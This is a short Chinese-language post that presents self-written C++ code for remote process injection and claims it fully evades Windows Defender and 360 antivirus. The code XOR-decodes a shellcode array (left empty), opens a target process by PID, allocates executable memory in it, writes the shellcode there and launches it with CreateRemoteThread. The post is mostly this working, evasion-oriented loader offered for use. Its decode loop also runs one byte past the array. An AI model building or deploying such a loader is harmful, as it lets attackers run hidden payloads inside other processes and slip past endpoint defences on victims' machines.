进程注入免杀学习
下面是自写的进程注入代码,已经对主要代码进行注释,相关函数如有不懂请查看官方文档,windows defend ,360全程免杀。
案例
#include <iostream>
#include <windows.h>
int main(int argc, char* argv[])
{
//unsigned char KEY = 10;
unsigned char shellcode[] =""; //xor加密后的shellcode
//unsigned char en_shellcode[] = "";
//int n = 0;
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
for (int i = 0; i <= sizeof(shellcode); i++) {
shellcode[i] ^= 10; ////10为xor加密key
}
/*
*输入要注入的pid
*打开注入进程
*把shellcode写入内存
*把数据写入进程
*创建线程
*关闭注入的进程句柄
*/
printf("Injecting to PID: %i", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}